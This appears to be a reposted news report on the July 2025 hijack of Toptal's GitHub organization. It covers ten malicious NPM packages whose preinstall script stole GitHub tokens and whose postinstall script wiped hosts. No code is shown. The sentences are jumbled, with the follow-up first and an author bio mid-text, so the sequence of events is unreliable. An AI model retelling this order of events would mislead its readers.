In the days that followed, the attackers modified the source code of Picasso on GitHub to include malware and published 10 malicious packages on NPM as Toptal, making them appear as legitimate updates. According to code security platform Socket, Toptal deprecated the malicious packages on July 23 and reverted to safe versions, but issued no public statement to alert users who had downloaded the malicious releases to the risks. Hackers compromised Toptal's GitHub organization account and used their access to publish ten malicious packages on the Node Package Manager (NPM) index. Toptal is a freelance talent marketplace that connects companies with software developers, designers, and finance experts. The company also maintains internal developer tools and design systems, most notably Picasso, which they make available through GitHub and NPM. Attackers hijacked Toptal's GitHub organization on July 20, and almost immediately made public all 73 of the repositories available, exposing private projects and source code. The hackers injected the malicious code into 'package.json' files to add two functions: steal data ('preinstall' script) and wipe hosts ('postinstall' script). Bill Toulas Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks. The packages included data-stealing code that collected GitHub authentication tokens and then wiped the victims' systems. Although the initial compromise method remains unknown, Socket lists multiple possibilities ranging from insider threats to phishing attacks targeting Toptal developers. The malicious packages were downloaded roughly 5,000 times before being detected, likely infecting developers with malware.
This Cyber News was published on www.bleepingcomputer.com. Publication date: Thu, 24 Jul 2025 13:30:15 +0000